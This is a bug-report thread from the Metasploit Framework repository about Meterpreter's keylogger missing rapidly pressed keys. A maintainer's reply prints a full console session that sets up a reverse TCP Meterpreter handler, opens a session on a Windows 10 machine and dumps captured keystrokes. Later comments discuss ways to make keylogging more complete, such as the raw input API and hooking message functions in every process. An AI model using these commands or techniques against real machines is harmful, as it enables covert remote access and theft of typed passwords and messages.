### ISSUE TITLE
Keylogger . Capture keys, but not all pressed. 

### ISSUE THREAD

**Issue by ichensky** [rapid7/metasploit-framework#7872]
## Steps to reproduce
 
If quickly press keys , keyloger will  not capture them.
1. $ keyscan_start
2. Enter in Windows window any keys quickly. 
3. $ keyscan_dump

## System stuff
Seems that error appeares somewhere here: 
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/capture/lockout_keylogger.rb
### Metasploit version
4.12.22-dev

**Comment by bwatters-r7** [comment]
It works for me locally, but can you give some more information because it might be that I'm not doing a good enough job at replicating your situation.

(1) What type of payload are you using?  In my test I used windows/x64/meterpreter/reverse_tcp.
(2) What is the Operating system on the target OS (The one you want to capture keys on)  In my test, it was WIndows 10 x64 Pro (You can run sysinfo at the meterpreter prompt if you are not sure)
(3) Do you get anything from the keyscan_dump at all, or is it just blank?

Here is how I did it:
```
msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49743) at 2017-01-26 13:44:56 -0600

meterpreter > sysinfo
Computer        : DESKTOP-OQBO9P9
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
noteI am in notepad
meterpreter > 
```
Target VM screen:
![image](https://cloud.githubusercontent.com/assets/17987018/22347780/d7dbd28e-e3ce-11e6-87ce-20ce7273cd41.png)

**Comment by wwebb-r7** [comment]
It looks as if the keylogger algo in metasploit-payloads is based on GetAsyncKeyState(), which IIRC will miss keys in a few different scenarios - like pressing them very rapidly.

Granted I haven't kept up with or thought key logging in a long while, I'd think a filter driver would be the only way to ensure that no keys are missed.  It's worth looking into in my opinion.

**Comment by ichensky** [comment]
Seems that meterpreter payload call GetAsyncKeyState  every 30 ms. Another possible scenario, when this function will not work properly, from msdn: "another application can call GetAsyncKeyState and receive the "recently pressed" bit instead of your application", so if one application already use this function, other applications can never receive result.
Like another variant,  keylogger is injected into all processes and intercepts the functions GetMessage, PeekMessage, TranslateMessage from user32.dll.

**Comment by wwebb-r7** [comment]
After poking around, it looks like the state-of-the-art in usermode keyloggers is [the raw input API](https://msdn.microsoft.com/en-us/library/windows/desktop/ms645536(v=vs.85).aspx) - state-of-the-art since Windows XP at least.  My two or three google searches worth of research seem to indicate that an application using this API for key logging will **not** miss any input.  I'll have to read up on it some more this weekend and look at some actual code.

Regardless of the best solution--and I do believe it should be solved--I think it's safe to say that this is a shortcoming in the current Meterpreter implementation and not a bug.

**Comment by ichensky** [comment]
Here is some code, can be useful for building raw input keylogger. https://github.com/ichensky/wri_keylogger . 
Yes, an application using this API for key logging is not miss any input.

**Comment by wwebb-r7** [comment]
Nice, thanks.  I have no idea when I or anyone else will get around to it, but we'll implement the API sometime in the future.

**Comment by OJ** [comment]
I'll get onto this at some point, but it's not high on the list of priorities.

**Comment by wwebb-r7** [comment]
Work has been in progress on this.  Closing.
